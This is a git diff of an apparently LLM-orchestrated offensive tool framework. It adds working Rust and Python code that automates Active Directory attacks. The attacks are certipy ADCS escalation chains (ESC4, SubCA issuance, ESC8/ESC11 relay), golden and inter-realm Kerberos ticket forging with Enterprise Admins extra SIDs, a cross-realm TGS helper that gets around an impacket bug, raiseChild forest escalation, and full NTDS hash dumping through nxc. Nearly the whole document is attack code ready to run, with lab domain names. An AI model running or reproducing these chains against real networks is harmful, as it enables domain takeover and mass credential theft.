outputs.push(("Request SubCA", step2)); + + let req_id = match request_id { + Some(id) => id, + None => { + let combined = outputs + .iter() + .map(|(name, o)| format!("=== {name} ===\n{}\n{}", o.stdout, o.stderr)) + .collect::>() + .join("\n"); + return Ok(ToolOutput { + stdout: combined, + stderr: "ERROR: Could not parse request ID from certipy output".into(), + exit_code: Some(1), + success: false, + }); + } + }; + + // Step 3: Issue the pending request using ManageCA rights + let mut step3_cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .flag("-issue-request", req_id.to_string()); + if let Some(t) = &target { + step3_cmd = step3_cmd.flag("-target", *t); + } + let step3 = step3_cmd.timeout_secs(120).execute().await?; + outputs.push(("Issue Request", step3)); + + // Step 4: Retrieve the issued certificate + let step4 = CommandBuilder::new("certipy") + .arg("req") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-retrieve", req_id.to_string()) + .flag("-dc-ip", dc_ip) + .flag("-out", &out_name); + let mut step4 = step4; + if let Some(t) = &target { + step4 = step4.flag("-target", *t); + } + let step4_out = step4.timeout_secs(120).execute().await?; + outputs.push(("Retrieve Cert", step4_out)); + + // Step 4b: If certipy couldn't create a PFX (key mismatch), combine manually + let pfx_path = format!("{out_name}.pfx"); + let crt_path = format!("{out_name}.crt"); + let key_path = format!("{out_name}.key"); + if !tokio::fs::try_exists(&pfx_path).await.unwrap_or(false) + && tokio::fs::try_exists(&crt_path).await.unwrap_or(false) + && tokio::fs::try_exists(&key_path).await.unwrap_or(false) + { + let combine = CommandBuilder::new("openssl") + .arg("pkcs12") + .flag("-in", &crt_path) + .flag("-inkey", &key_path) + .arg("-export") + .flag("-out", &pfx_path) + .flag("-passout", "pass:") + .timeout_secs(30) + .execute() + .await?; + outputs.push(("Combine PFX", combine)); + } + + // Step 5: Authenticate with the retrieved PFX + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + + let step5 = CommandBuilder::new("certipy") + .arg("auth") + .flag("-pfx", &pfx_path) + .flag("-dc-ip", dc_ip) + .flag("-domain", domain) .timeout_secs(120) .execute() + .await?; + let auth_success = step5.success; + outputs.push(("Authenticate", step5)); + + let combined_stdout = outputs + .iter() + .map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stdout)) + .collect::>() + .join("\n"); + let combined_stderr = outputs + .iter() + .map(|(name, o)| format!("=== Step: {name} ===\n{}", o.stderr)) + .collect::>() + .join("\n"); + + Ok(ToolOutput { + stdout: combined_stdout, + stderr: combined_stderr, + exit_code: if auth_success { Some(0) } else { Some(1) }, + success: auth_success, + }) +} + +/// Start a Certipy relay listener for ESC8 (HTTP) or ESC11 (RPC) attacks. +/// +/// Required args: `target`, `ca` +/// Optional args: `template` +/// +/// For ESC8: `certipy relay -target http://ca-host -ca CA-NAME` +/// For ESC11: `certipy relay -target rpc://ca-host -ca CA-NAME` +pub async fn certipy_relay(args: &Value) -> Result { + let target = required_str(args, "target")?; + let ca = required_str(args, "ca")?; + let template = optional_str(args, "template"); + + CommandBuilder::new("certipy") + .arg("relay") + .flag("-target", target) + .flag("-ca", ca) + .flag_opt("-template", template) + .timeout_secs(300) + .execute() .await } @@ -130,12 +536,34 @@ pub async fn certipy_template_esc4(args: &Value) -> Result { /// request -> authentication. /// /// Required args: `username`, `domain`, `password`, `template`, `dc_ip`, -/// `ca`, `pfx_path` -/// Optional args: `upn` +/// `ca` +/// Optional args: `upn`, `target`, `sid` pub async fn certipy_esc4_full_chain(args: &Value) -> Result { let template_output = certipy_template_esc4(args).await?; - let request_output = certipy_request(args).await?; - let auth_output = certipy_auth(args).await?; + + // Generate a unique output name for the PFX and inject into args + let template = args + .get("template") + .and_then(|v| v.as_str()) + .unwrap_or("esc4"); + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out_name = format!("cert_{template}_{ts}"); + let pfx_path = format!("{out_name}.pfx"); + + let mut req_args = args.clone(); + if let Some(obj) = req_args.as_object_mut() { + obj.insert("out".into(), serde_json::json!(out_name)); + } + let request_output = certipy_request(&req_args).await?; + + let mut auth_args = args.clone(); + if let Some(obj) = auth_args.as_object_mut() { + obj.insert("pfx_path".into(), serde_json::json!(pfx_path)); + } + let auth_output = certipy_auth(&auth_args).await?; let combined_stdout = format!( "=== Step 1: Template Modification ===\n{}\n\ @@ -164,6 +592,8 @@ mod tests { use crate::args::{optional_bool, optional_str, required_str}; use serde_json::json; + // --- certipy_find --- + #[test] fn certipy_find_missing_username() { let args = json!({ @@ -243,6 +673,8 @@ mod tests { assert!(vulnerable); } + // --- certipy_request --- + #[test] fn certipy_request_missing_ca() { let args = json!({ @@ -313,6 +745,8 @@ mod tests { assert!(optional_str(&args, "upn").is_none()); } + // --- certipy_auth --- + #[test] fn certipy_auth_missing_pfx_path() { let args = json!({ @@ -352,6 +786,8 @@ mod tests { assert_eq!(required_str(&args, "domain").unwrap(), "contoso.local"); } + // --- certipy_shadow --- + #[test] fn certipy_shadow_missing_target() { let args = json!({ @@ -378,6 +814,8 @@ mod tests { assert_eq!(user_at_domain, "admin@contoso.local"); } + // --- certipy_template_esc4 --- + #[test] fn certipy_template_esc4_missing_template() { let args = json!({ @@ -404,6 +842,8 @@ mod tests { assert_eq!(user_at_domain, "admin@contoso.local"); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] @@ -478,6 +918,27 @@ mod tests { assert!(super::certipy_template_esc4(&args).await.is_ok()); } + #[tokio::test] + async fn certipy_relay_executes() { + mock::push(mock::success()); + let args = json!({ + "target": "rpc://192.168.58.10", "ca": "contoso-CA" + }); + assert!(super::certipy_relay(&args).await.is_ok()); + } + + #[tokio::test] + async fn certipy_request_with_application_policies_executes() { + mock::push(mock::success()); + let args = json!({ + "username": "admin", "domain": "contoso.local", + "password": "P@ss", "ca": "contoso-CA", "template": "ESC15", + "dc_ip": "192.168.58.1", + "application_policies": "1.3.6.1.5.5.7.3.2" + }); + assert!(super::certipy_request(&args).await.is_ok()); + } + #[tokio::test] async fn certipy_esc4_full_chain_executes() { // 3 execute calls: template, request, auth diff --git a/ares-tools/src/privesc/cross_realm_tgs.py b/ares-tools/src/privesc/cross_realm_tgs.py new file mode 100644 index 00000000..a80e40c9 --- /dev/null +++ b/ares-tools/src/privesc/cross_realm_tgs.py @@ -0,0 +1,92 @@ +#!/usr/bin/env python3 +"""Request a TGS using a cross-realm (inter-realm) TGT. + +Workaround for impacket #315: getST/SMB cross-realm referral is broken because +``CCache.parseFile`` and ``getST.run`` only look up ``krbtgt/@`` +(a regular intra-realm TGT) when ``-k -no-pass`` is given. A forged inter-realm +TGT has server ``krbtgt/@``, so it is silently ignored and +getST falls through to a no-pass authentication that fails with +``KDC_ERR_WRONG_REALM`` (and exit 0, hiding the failure). + +This helper loads the cross-realm TGT directly out of the input ccache, calls +``getKerberosTGS`` against the target realm's KDC, and writes the resulting TGS +to a new ccache that ``nxc`` / ``secretsdump`` consume via ``KRB5CCNAME``. +""" + +import argparse +import sys + +from impacket.krb5 import constants +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGS +from impacket.krb5.types import Principal + + +def main() -> int: + p = argparse.ArgumentParser() + p.add_argument("--in-ccache", required=True, help="ccache containing the cross-realm TGT") + p.add_argument("--out-ccache", required=True, help="ccache to write resulting TGS to") + p.add_argument("--spn", required=True, help="service SPN, e.g. cifs/dc.target.local") + p.add_argument("--source-realm", required=True, help="realm where the TGT was issued") + p.add_argument("--target-realm", required=True, help="realm of the SPN") + p.add_argument("--target-kdc", required=True, help="target realm KDC IP/host to send TGS-REQ to") + p.add_argument( + "--append", + action="store_true", + help="if --out-ccache exists, load it and merge the new TGS into it (preserves the inter-realm TGT and any prior service tickets)", + ) + args = p.parse_args() + + src_realm = args.source_realm.upper() + tgt_realm = args.target_realm.upper() + + in_cc = CCache.loadFile(args.in_ccache) + if in_cc is None: + print(f"[!] failed to load {args.in_ccache}", file=sys.stderr) + return 2 + + cross_principal = f"krbtgt/{tgt_realm}@{src_realm}" + creds = in_cc.getCredential(cross_principal, anySPN=False) + if creds is None: + print(f"[!] no cross-realm TGT for {cross_principal} in {args.in_ccache}", file=sys.stderr) + return 3 + + tgt = creds.toTGT() + server = Principal(args.spn, type=constants.PrincipalNameType.NT_SRV_INST.value) + + print( + f"[*] requesting TGS for {args.spn} from {args.target_kdc} ({tgt_realm})", + file=sys.stderr, + ) + # getKerberosTGS returns (tgs_rep, cipher, tgt_session_key, new_session_key). + # tgt_session_key decrypts the TGS-REP enc-part (key usage 8); new_session_key + # is the application key inside the TGS. fromTGS expects (tgs, oldKey, newKey). + tgs, _cipher, tgt_session_key, new_session_key = getKerberosTGS( + server, + tgt_realm, + args.target_kdc, + tgt["KDC_REP"], + tgt["cipher"], + tgt["sessionKey"], + ) + + import os + if args.append and os.path.exists(args.out_ccache): + out = CCache.loadFile(args.out_ccache) or CCache() + scratch = CCache() + scratch.fromTGS(tgs, tgt_session_key, new_session_key) + for cred in scratch.credentials: + out.credentials.append(cred) + if out.principal is None and scratch.principal is not None: + out.principal = scratch.principal + out.saveFile(args.out_ccache) + else: + out = CCache() + out.fromTGS(tgs, tgt_session_key, new_session_key) + out.saveFile(args.out_ccache) + print(f"[+] wrote TGS to {args.out_ccache}", file=sys.stderr) + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/ares-tools/src/privesc/cve_exploits.rs b/ares-tools/src/privesc/cve_exploits.rs index 050d125d..351c0f86 100644 --- a/ares-tools/src/privesc/cve_exploits.rs +++ b/ares-tools/src/privesc/cve_exploits.rs @@ -74,6 +74,8 @@ mod tests { use crate::args::{optional_bool, optional_str, required_str}; use serde_json::json; + // --- nopac --- + #[test] fn nopac_missing_domain() { let args = json!({ @@ -177,6 +179,8 @@ mod tests { assert!(shell); } + // --- printnightmare --- + #[test] fn printnightmare_missing_target() { let args = json!({ @@ -216,6 +220,8 @@ mod tests { assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local"); } + // --- petitpotam_unauth --- + #[test] fn petitpotam_unauth_missing_listener() { let args = json!({ @@ -242,6 +248,8 @@ mod tests { assert_eq!(required_str(&args, "target").unwrap(), "dc01.contoso.local"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/delegation.rs b/ares-tools/src/privesc/delegation.rs index b2ac80f9..48597d8d 100644 --- a/ares-tools/src/privesc/delegation.rs +++ b/ares-tools/src/privesc/delegation.rs @@ -81,9 +81,12 @@ pub async fn generate_golden_ticket(args: &Value) -> Result { let domain = required_str(args, "domain")?; let extra_sid = optional_str(args, "extra_sid"); let username = optional_str(args, "username").unwrap_or("Administrator"); + // -nthash expects a 32-char NT hash; strip any LM half if the LLM + // passed a `LM:NT` concatenated form. + let nt = credentials::nt_hash_only(krbtgt_hash); CommandBuilder::new("impacket-ticketer") - .flag("-nthash", krbtgt_hash) + .flag("-nthash", nt) .flag("-domain-sid", domain_sid) .flag("-domain", domain) .flag_opt("-extra-sid", extra_sid) @@ -196,18 +199,37 @@ pub async fn krbrelayup(args: &Value) -> Result { /// /// Required args: `child_domain`, `username` /// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one required. -/// Optional args: `target_domain` +/// Optional args: `child_dc_ip`, `parent_domain`, `parent_dc_ip` — when supplied, +/// these are written to `/etc/hosts` so the impacket script can resolve domain +/// FQDNs without forest DNS access. raiseChild itself only takes the positional +/// `domain/user[:pass]` + auth flags; the IP args are NOT forwarded to it. +/// +/// raiseChild auto-discovers the parent forest root via the child DC's +/// trustedDomain LDAP objects, so callers don't need to supply parent FQDN +/// or DC IPs to the script. But raiseChild *does* call `gethostbyname()` / +/// SMB-binds against the bare domain name (e.g. `child.contoso.local`), +/// not the DC FQDN — so on a worker without forest DNS this fails with +/// `Name or service not known`. Pre-seeding `/etc/hosts` fixes that. pub async fn raise_child(args: &Value) -> Result { let child_domain = required_str(args, "child_domain")?; let username = required_str(args, "username")?; let password = optional_str(args, "password"); let hash = optional_str(args, "hash"); - let target_domain = optional_str(args, "target_domain"); + let child_dc_ip = optional_str(args, "child_dc_ip").filter(|s| !s.is_empty()); + let parent_domain = optional_str(args, "parent_domain").filter(|s| !s.is_empty()); + let parent_dc_ip = optional_str(args, "parent_dc_ip").filter(|s| !s.is_empty()); if password.is_none() && hash.is_none() { anyhow::bail!("raise_child requires either 'password' or 'hash' for authentication"); } + if let Some(ip) = child_dc_ip { + crate::privesc::trust::ensure_hosts_entry(ip, child_domain)?; + } + if let (Some(pd), Some(pip)) = (parent_domain, parent_dc_ip) { + crate::privesc::trust::ensure_hosts_entry(pip, pd)?; + } + let mut cmd = CommandBuilder::new("raiseChild.py"); if let Some(h) = hash { @@ -218,8 +240,6 @@ pub async fn raise_child(args: &Value) -> Result { cmd = cmd.arg(format!("{child_domain}/{username}:{p}")); } - cmd = cmd.flag_opt("-target-domain", target_domain); - // raiseChild performs multiple secretsdumps internally — needs extra time cmd.timeout_secs(300).execute().await } @@ -686,6 +706,8 @@ mod tests { assert_eq!(val, "/tmp/admin.ccache"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/gmsa.rs b/ares-tools/src/privesc/gmsa.rs index f7edfd3c..9250965c 100644 --- a/ares-tools/src/privesc/gmsa.rs +++ b/ares-tools/src/privesc/gmsa.rs @@ -74,6 +74,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- gmsa_dump_passwords --- + #[test] fn gmsa_dump_passwords_requires_dc_ip() { let args = json!({ @@ -121,6 +123,8 @@ mod tests { assert_eq!(optional_str(&args, "domain"), Some("contoso.local")); } + // --- unconstrained_tgt_dump --- + #[test] fn unconstrained_tgt_dump_missing_domain() { let args = json!({ @@ -178,6 +182,8 @@ mod tests { ); } + // --- unconstrained_coerce_and_capture --- + #[test] fn unconstrained_coerce_missing_coerce_from() { let args = json!({ @@ -217,6 +223,8 @@ mod tests { assert_eq!(creds, "contoso.local/admin:P@ssw0rd!@dc01.contoso.local"); } + // --- mock executor tests --- + use super::*; use crate::executor::mock; diff --git a/ares-tools/src/privesc/trust.rs b/ares-tools/src/privesc/trust.rs index a02dfce1..e81e8787 100644 --- a/ares-tools/src/privesc/trust.rs +++ b/ares-tools/src/privesc/trust.rs @@ -1,6 +1,6 @@ //! Trust / cross-forest tool executors. -use anyhow::Result; +use anyhow::{Context, Result}; use serde_json::Value; use crate::args::{optional_str, required_str}; @@ -8,18 +8,68 @@ use crate::credentials; use crate::executor::CommandBuilder; use crate::ToolOutput; +/// Embedded Python helper that does a cross-realm TGS-REQ using a forged +/// inter-realm TGT. See `forge_inter_realm_and_dump` for why this exists. +const CROSS_REALM_TGS_HELPER: &str = include_str!("cross_realm_tgs.py"); + +/// Idempotently ensure `/etc/hosts` contains an ` ` mapping so +/// callers using FQDNs (Kerberos SPN match) can resolve them on a worker that +/// has no DNS path to the lab forest. Reads the current file, returns Ok if +/// any line already maps the hostname to the given IP, otherwise appends a +/// new entry. The append is racy across concurrent runs but a duplicate line +/// is harmless and `getaddrinfo` returns the first match, so we don't lock. +/// +/// Errors are surfaced — failing to write `/etc/hosts` would leave the caller +/// to silently fail at `nxc` time, which is exactly the symptom we're fixing. +pub(super) fn ensure_hosts_entry(ip: &str, hostname: &str) -> Result<()> { + use std::io::Write as _; + let path = "/etc/hosts"; + let current = std::fs::read_to_string(path) + .with_context(|| format!("failed to read {path} for hostname mapping"))?; + let needle = format!(" {hostname} "); + let needle_eol = format!(" {hostname}\n"); + for line in current.lines() { + if line.trim_start().starts_with('#') { + continue; + } + let padded = format!(" {line} \n"); + if padded.contains(&needle) || padded.contains(&needle_eol) { + let mut fields = line.split_whitespace(); + if fields.next() == Some(ip) && fields.any(|f| f.eq_ignore_ascii_case(hostname)) { + return Ok(()); + } + } + } + let mut f = std::fs::OpenOptions::new() + .append(true) + .open(path) + .with_context(|| format!("failed to open {path} for hostname mapping"))?; + writeln!(f, "{ip} {hostname}").with_context(|| format!("failed to append to {path}"))?; + Ok(()) +} + /// Extract trust keys by dumping secrets for a trusted domain's machine account. /// -/// Required args: `domain`, `username`, `password`, `dc_ip`, `trusted_domain` +/// Required args: `domain`, `username`, `dc_ip`, `trusted_domain` +/// Auth: `password` (plaintext) OR `hash` (NTLM pass-the-hash). At least one +/// non-empty value required — empty `password` would trigger an interactive +/// `getpass()` prompt inside impacket-secretsdump and EOF the agent's stdin. pub async fn extract_trust_key(args: &Value) -> Result { let domain = required_str(args, "domain")?; let username = required_str(args, "username")?; - let password = required_str(args, "password")?; + let password = optional_str(args, "password").filter(|s| !s.is_empty()); + let hash = optional_str(args, "hash").filter(|s| !s.is_empty()); let dc_ip = required_str(args, "dc_ip")?; let trusted_domain = required_str(args, "trusted_domain")?; + if password.is_none() && hash.is_none() { + anyhow::bail!( + "extract_trust_key requires non-empty 'password' or 'hash' for authentication" + ); + } + let (target_str, extra_args) = - credentials::impacket_auth(Some(domain), username, Some(password), None, dc_ip); + credentials::impacket_auth(Some(domain), username, password, hash, dc_ip); let just_dc_user = format!("{trusted_domain}$"); @@ -36,28 +86,335 @@ pub async fn extract_trust_key(args: &Value) -> Result { /// /// Required args: `trust_key`, `source_sid`, `source_domain`, `target_sid`, /// `target_domain` -/// Optional args: `username` +/// Optional args: `username`, `extra_sid`, `aes_key` +/// +/// For child-to-parent escalation (same forest), pass `extra_sid` with the +/// parent domain Enterprise Admins SID (e.g. `S-1-5-21-…-519`). +/// For cross-forest trusts, omit `extra_sid` — SID filtering blocks RIDs < 1000. +/// +/// When `aes_key` is supplied, prefer it over the NT hash — Win2016+ KDCs +/// validate AES256 inter-realm tickets without RC4. impacket-ticketer rejects +/// both flags simultaneously ("Pick only one" — exits without writing a ccache), +/// so we choose AES when available and fall back to NT hash otherwise. NT-only +/// tickets validate against dc01.fabrikam.local in the lab — verified +/// working for cross-realm bloodyAD LDAP bind. pub async fn create_inter_realm_ticket(args: &Value) -> Result { let trust_key = required_str(args, "trust_key")?; let source_sid = required_str(args, "source_sid")?; let source_domain = required_str(args, "source_domain")?; - let target_sid = required_str(args, "target_sid")?; + // target_sid unused by ticketer but accepted for schema parity with + // forge_inter_realm_and_dump; ticketer derives the realm from -domain. + let _target_sid = optional_str(args, "target_sid"); let target_domain = required_str(args, "target_domain")?; let username = optional_str(args, "username").unwrap_or("Administrator"); + let extra_sid = optional_str(args, "extra_sid"); + let aes_key = optional_str(args, "aes_key").filter(|s| !s.is_empty()); + // Optional service-ticket pre-fetch params. When supplied, after forging + // the inter-realm TGT we chain cross_realm_tgs.py to also obtain + // ldap/ and cifs/ service tickets, + // appended into the same ccache. This is required because MIT GSSAPI + // clients (e.g. `ldapsearch -Y GSSAPI`) cannot walk a referral starting + // from `krbtgt/@` — they need a service-ticket entry + // already present. Without these, the inter-realm TGT is unusable for + // ldapsearch even though it is a valid Kerberos credential. + let target_dc_fqdn = optional_str(args, "target_dc_fqdn").filter(|s| !s.is_empty()); + let target_dc_ip = optional_str(args, "target_dc_ip").filter(|s| !s.is_empty()); - let extra_sid = format!("{target_sid}-519"); let spn = format!("krbtgt/{target_domain}"); - - CommandBuilder::new("impacket-ticketer") - .flag("-nthash", trust_key) + // -nthash expects a 32-char hex NT hash. LLMs frequently pass the + // concatenated `LM:NT` form harvested from secretsdump output, which + // ticketer rejects with `'Odd-length string'`. Strip to NT half. + let nt = credentials::nt_hash_only(trust_key); + + // Write to a deterministic per-operation directory under /tmp so downstream + // tools on the same host can consume the ccache without knowing the CWD at + // ticket-forge time. The path is deterministic: no race between concurrent + // forge calls for different (source, target, user) triples. + let ticket_dir = std::path::PathBuf::from("/tmp/ares-tickets"); + let _ = std::fs::create_dir_all(&ticket_dir); + let safe_src = source_domain.replace('.', "_"); + let safe_tgt = target_domain.replace('.', "_"); + let ccache_name = format!("{safe_src}__{safe_tgt}__{username}.ccache"); + let ccache_path = ticket_dir.join(&ccache_name); + + // impacket-ticketer "Pick only one" — when we plan to chain cross_realm_tgs + // (target_dc_fqdn + target_dc_ip both present), force NT-only. + // impacket has a salt-derivation bug on trust accounts: tickets forged with + // -aesKey produce KRB_AP_ERR_BAD_INTEGRITY when used as TGT input to a + // subsequent cross-realm getKerberosTGS call. NT-only avoids the bad salt + // path. When the chain is NOT requested (no target_dc_*), AES is fine for + // the TGT alone (LDAP-bind callers can use it directly). + let chain_requested = target_dc_fqdn.is_some() && target_dc_ip.is_some(); + let mut cmd = CommandBuilder::new("impacket-ticketer") .flag("-domain-sid", source_sid) - .flag("-domain", source_domain) - .flag("-extra-sid", extra_sid) + .flag("-domain", source_domain); + + if chain_requested { + cmd = cmd.flag("-nthash", nt); + } else if let Some(aes) = aes_key { + cmd = cmd.flag("-aesKey", aes); + } else { + cmd = cmd.flag("-nthash", nt); + } + + if let Some(es) = extra_sid { + cmd = cmd.flag("-extra-sid", es); + } + + // Run in ticket_dir so impacket-ticketer writes .ccache there, + // then rename to the deterministic ccache_path. + let mut output = cmd .flag("-spn", spn) .arg(username) + .current_dir(&ticket_dir) .timeout_secs(120) .execute() - .await + .await?; + + // impacket-ticketer writes `.ccache` in cwd. Rename to our + // deterministic path (handles the common case where username is "Administrator"). + let default_ccache = ticket_dir.join(format!("{username}.ccache")); + if default_ccache.exists() && default_ccache != ccache_path { + let _ = std::fs::rename(&default_ccache, &ccache_path); + } + + // Optional Step 2: chain cross_realm_tgs.py to fetch ldap/ and + // cifs/ service tickets and append them to the same ccache. This + // turns the otherwise-unusable inter-realm TGT into a ccache that + // `ldapsearch -Y GSSAPI` can consume directly. + if ccache_path.exists() { + if let (Some(dc_fqdn), Some(dc_ip)) = (target_dc_fqdn, target_dc_ip) { + let helper_path = ticket_dir.join("cross_realm_tgs.py"); + if let Err(e) = std::fs::write(&helper_path, CROSS_REALM_TGS_HELPER) { + output.stdout.push_str(&format!( + "\n[!] failed to write cross_realm_tgs helper: {e}\n" + )); + } else { + for spn in [format!("ldap/{dc_fqdn}"), format!("cifs/{dc_fqdn}")] { + let res = CommandBuilder::new("python3") + .arg(helper_path.to_string_lossy().into_owned()) + .flag("--in-ccache", ccache_path.to_string_lossy().into_owned()) + .flag("--out-ccache", ccache_path.to_string_lossy().into_owned()) + .flag("--spn", &spn) + .flag("--source-realm", source_domain.to_uppercase()) + .flag("--target-realm", target_domain.to_uppercase()) + .flag("--target-kdc", dc_ip) + .arg("--append") + .current_dir(&ticket_dir) + .timeout_secs(120) + .execute() + .await; + match res { + Ok(svc_out) => { + output.stdout.push_str(&format!( + "\n=== service ticket {spn} ===\n{}\n{}\n", + svc_out.stdout, svc_out.stderr + )); + if !svc_out.success { + output.stdout.push_str(&format!( + "[!] service ticket fetch for {spn} failed (exit {:?})\n", + svc_out.exit_code + )); + } + } + Err(e) => { + output.stdout.push_str(&format!( + "\n[!] service ticket fetch for {spn} errored: {e}\n" + )); + } + } + } + } + } + } + + // Append the ticket path to stdout so the orchestrator can parse it. + if ccache_path.exists() { + output + .stdout + .push_str(&format!("\nARES_TICKET_PATH={}\n", ccache_path.display())); + } + + Ok(output) +} + +/// Forge an inter-realm Kerberos ticket, request a TGS for the target DC, +/// then run `nxc smb --ntds` against it — all in a single worker invocation. +/// +/// This wraps the impacket forge-and-present workaround for the cross-realm +/// referral bug (fortra/impacket#315) into ONE deterministic tool call so +/// the orchestrator can dispatch every parameter directly, without laundering +/// the trust key / SIDs through an LLM. All three steps share a tempdir as +/// cwd so the ccache files produced are colocated on disk. +/// +/// Why three steps and not two: +/// 1. **ticketer** forges the inter-realm TGT (krbtgt/ issued by +/// ) using the trust key. Forced to **NT-only** — impacket has a +/// salt-derivation bug on trust accounts that yields +/// `KRB_AP_ERR_BAD_INTEGRITY` whenever the AES key is supplied alongside +/// the NT hash. The NT-only ticket validates against modern KDCs. +/// 2. **`cross_realm_tgs.py`** (embedded helper) loads the inter-realm TGT +/// directly and calls `getKerberosTGS` against the target KDC for +/// `cifs/`. We can't use `impacket-getST -k -no-pass` here: +/// impacket's `CCache.parseFile` only matches `krbtgt/@` +/// (intra-realm TGTs) so the inter-realm credential `krbtgt/@` +/// is silently ignored. getST then falls through to no-pass auth that +/// returns `KDC_ERR_WRONG_REALM` with exit code 0, hiding the failure. +/// 3. **nxc smb --ntds** dumps NTDS using the TGS via Kerberos cache. +/// `impacket-secretsdump` is unusable here: its DRSUAPI bind rejects +/// cross-realm TGS auth with `Bind context rejected: invalid_checksum`. +/// netexec's `--ntds vss` path uses a different bind sequence that +/// accepts the cross-realm credential. +/// +/// Required args: `trust_key`, `source_sid`, `source_domain`, `target_domain`, +/// `target` (DC hostname for cifs/ SPN matching) +/// Optional args: `target_sid` (kept for parity), `username` (default +/// "Administrator"), `extra_sid` (child→parent only — omit for +/// cross-forest), `dc_ip` (passed as -dc-ip and to nxc). +pub async fn forge_inter_realm_and_dump(args: &Value) -> Result { + let trust_key = required_str(args, "trust_key")?; + let source_sid = required_str(args, "source_sid")?; + let source_domain = required_str(args, "source_domain")?; + let target_domain = required_str(args, "target_domain")?; + let target = required_str(args, "target")?; + // target_sid currently unused by ticketer but accepted for API parity + // with create_inter_realm_ticket; ticketer derives the realm from -domain. + let _target_sid = optional_str(args, "target_sid"); + let username = optional_str(args, "username") + .unwrap_or("Administrator") + .to_string(); + let extra_sid = optional_str(args, "extra_sid"); + let dc_ip = optional_str(args, "dc_ip"); + + let nt = credentials::nt_hash_only(trust_key); + + let tempdir = tempfile::tempdir().context("failed to create tempdir for inter-realm forge")?; + let cwd = tempdir.path().to_path_buf(); + + // --- Step 1: forge inter-realm TGT (NT-only) --- + let krbtgt_spn = format!("krbtgt/{target_domain}"); + let mut ticketer = CommandBuilder::new("impacket-ticketer") + .flag("-nthash", nt) + .flag("-domain-sid", source_sid) + .flag("-domain", source_domain); + if let Some(es) = extra_sid { + ticketer = ticketer.flag("-extra-sid", es); + } + let ticketer_output = ticketer + .flag("-spn", krbtgt_spn) + .arg(&username) + .current_dir(&cwd) + .timeout_secs(120) + .execute() + .await?; + + if !ticketer_output.success { + return Ok(ticketer_output); + } + + let tgt_ccache = cwd.join(format!("{username}.ccache")); + if !tgt_ccache.exists() { + anyhow::bail!( + "impacket-ticketer reported success but {} was not produced", + tgt_ccache.display() + ); + } + + // --- Step 2: cross-realm TGS via embedded helper --- + // + // Write the helper to the tempdir and invoke it. The helper opens the + // forged inter-realm TGT, calls `getKerberosTGS` directly against the + // target KDC, and writes the resulting TGS to a new ccache. See the + // function docstring above for why we can't use `impacket-getST` here. + let helper_path = cwd.join("cross_realm_tgs.py"); + std::fs::write(&helper_path, CROSS_REALM_TGS_HELPER) + .context("failed to write cross_realm_tgs helper")?; + + let cifs_spn = format!("cifs/{target}"); + let tgs_ccache = cwd.join("cross_realm_tgs.ccache"); + let target_kdc = dc_ip.unwrap_or(target); + + let getst_output = CommandBuilder::new("python3") + .arg(helper_path.to_string_lossy().into_owned()) + .flag("--in-ccache", tgt_ccache.to_string_lossy().into_owned()) + .flag("--out-ccache", tgs_ccache.to_string_lossy().into_owned()) + .flag("--spn", &cifs_spn) + .flag("--source-realm", source_domain.to_uppercase()) + .flag("--target-realm", target_domain.to_uppercase()) + .flag("--target-kdc", target_kdc) + .current_dir(&cwd) + .timeout_secs(120) + .execute() + .await?; + + if !getst_output.success { + return Ok(ToolOutput { + stdout: format!( + "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}", + ticketer_output.stdout, getst_output.stdout + ), + stderr: format!( + "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}", + ticketer_output.stderr, getst_output.stderr + ), + exit_code: getst_output.exit_code, + success: false, + }); + } + + if !tgs_ccache.exists() { + anyhow::bail!( + "cross_realm_tgs helper reported success but {} was not produced", + tgs_ccache.display() + ); + } + + // --- Step 3: nxc smb --ntds via the TGS ccache --- + // + // The cached TGS is bound to `cifs/{target}` where `target` is the FQDN + // baked into the ticket by step 2. nxc auto-builds its SPN from the + // command-line target, so we MUST pass the FQDN here — passing the IP + // would make nxc look up `cifs/` in the cache, miss, and silently + // fall through with exit 0 / empty stdout. + // + // FQDN connect requires DNS, but on a stock Kali worker `/etc/resolv.conf` + // points at AWS internal DNS which does not know the lab forest. Without + // a hosts entry the socket-layer lookup fails before nxc can speak SMB, + // and the same silent exit-0 failure mode shows up — masking real auth + // outcomes from the orchestrator's krbtgt-observation check. Append an + // ` ` line to `/etc/hosts` (the worker runs as root) so getaddrinfo + // resolves cleanly. The append is idempotent — duplicate lines are harmless + // and survive concurrent runs without locking. + if let Some(ip) = dc_ip { + ensure_hosts_entry(ip, target)?; + } + let dump_output = CommandBuilder::new("nxc") + .arg("smb") + .arg(target) + .arg("-k") + .arg("--use-kcache") + .arg("--ntds") + .arg("vss") + .env("KRB5CCNAME", tgs_ccache.to_string_lossy().into_owned()) + .current_dir(&cwd) + .timeout_secs(600) + .execute() + .await?; + + let stdout = format!( + "=== impacket-ticketer ===\n{}\n=== cross_realm_tgs ===\n{}\n=== nxc smb --ntds ===\n{}", + ticketer_output.stdout, getst_output.stdout, dump_output.stdout + ); + let stderr = format!( + "--- ticketer stderr ---\n{}\n--- cross_realm_tgs stderr ---\n{}\n--- nxc stderr ---\n{}", + ticketer_output.stderr, getst_output.stderr, dump_output.stderr + ); + Ok(ToolOutput { + stdout, + stderr, + exit_code: dump_output.exit_code, + success: dump_output.success, + }) } /// Look up domain SIDs using impacket-lookupsid. @@ -126,6 +483,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- extract_trust_key --- 